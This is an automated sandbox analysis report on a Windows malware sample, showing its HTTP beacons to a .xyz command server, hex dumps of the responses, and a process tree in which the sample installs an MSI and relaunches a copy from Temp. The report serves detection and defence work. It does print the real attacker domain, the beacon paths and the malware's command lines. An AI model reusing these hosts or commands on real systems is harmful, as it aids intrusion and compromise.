                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
                                                                                                                                                    Jan 29, 2021 17:36:56.298440933 CET230OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:56.357669115 CET231INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:56 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d32f2108bb076b21c1c63ae0d28e80c8e1611938216; expires=Sun, 28-Feb-21 16:36:56 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a51900000fa8854a82000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vEXjgAcCWfJcyMvkOYR6nKRhmvxrpnQ9If4uVJkHoTC%2BmHUhl3TvkTuOyvHTcR3VHcQHxuwGIbIsHFsPo39NKLWzrt1TdOP5Xspnnfrx95e0%2BZOKcA%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ffc1c10fa88-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
                                                                                                                                                    Jan 29, 2021 17:36:56.360771894 CET236OUTGET /info_old/r HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:56.421464920 CET237INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:56 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d32f2108bb076b21c1c63ae0d28e80c8e1611938216; expires=Sun, 28-Feb-21 16:36:56 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a51d00000fa881c8c6000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2R%2F90jP2adhrJ1reGaFc1uVWg0BTxfIBXZsYWbtqsmfadTi2Wy%2FxqhIGyogEoPocOCreTgk%2BamVP09M9vOnBLLLcfzZaC3rdbKVDP0I9AO%2Bdkcw30w%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ffc7cf6fa88-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewpo
                                                                                                                                                    Jan 29, 2021 17:36:58.555171967 CET242OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:58.605498075 CET243INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:58 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d603c7de3c048bd21973481136751b3721611938218; expires=Sun, 28-Feb-21 16:36:58 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a5a5f0000fa881330c000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=NJAqAO4yJWPuTq9evI1AWyMeynWnmxEMn3et8pb%2FIRWAHDRDQDU542KBRo8FHOiPxwUweybLvunWWx5kRs55wa40ZiQgHguurv9cq%2BH%2BRXDGjR9gjw%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 6194600a3d73fa88-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    3192.168.2.649734104.21.23.1680C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Jan 29, 2021 17:37:04.743166924 CET254OUTGET /info_old/ddd HTTP/1.1
                                                                                                                                                    Host: 84CFBA021A5A6662.xyz
                                                                                                                                                    Accept: */*
                                                                                                                                                    Jan 29, 2021 17:37:04.802903891 CET256INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:37:04 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d1b86623561079a9b662c2aad2de952a91611938224; expires=Sun, 28-Feb-21 16:37:04 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a728b00001ea9ad122000000001
                                                                                                                                                    Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wH1AHcFc3kF96qmxaUBXlzDcY1TrtECZey%2Fv0bKfWmOYNqSDV7GGD9mBtDVKq6xIogzQHOnoCmodhKiY1BSgSe06IfFuNHZGnZqol7y6zlSw5Ire4A%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61946030d9121ea9-AMS
                                                                                                                                                    Data Raw: 31 30 64 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f
                                                                                                                                                    Data Ascii: 10d5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" co


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    Analysis Process: Cyfj6XGbkd.exe PID: 1676 Parent PID: 5892

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:33
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4247224 bytes
                                                                                                                                                    MD5 hash:63204EB716C856723A010747D58A6B00
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.366076006.00000000025E0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                    Reputation:low

                                                                                                                                                    Analysis Process: msiexec.exe PID: 4828 Parent PID: 1676

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:38
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
                                                                                                                                                    Imagebase:0xf20000
                                                                                                                                                    File size:59904 bytes
                                                                                                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: 56BB1610C0318054.exe PID: 476 Parent PID: 1676

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:39
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4247224 bytes
                                                                                                                                                    MD5 hash:63204EB716C856723A010747D58A6B00
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000002.00000002.413908813.0000000002810000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    • Detection: 24%, Metadefender, Browse
                                                                                                                                                    • Detection: 59%, ReversingLabs
                                                                                                                                                    Reputation:low

                                                                                                                                                    Analysis Process: msiexec.exe PID: 4584 Parent PID: 3980

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:39
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding C6BE2003C858D11BE040843C2C46EAA2 C
                                                                                                                                                    Imagebase:0xf20000
                                                                                                                                                    File size:59904 bytes
                                                                                                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: 56BB1610C0318054.exe PID: 576 Parent PID: 1676

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:40
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
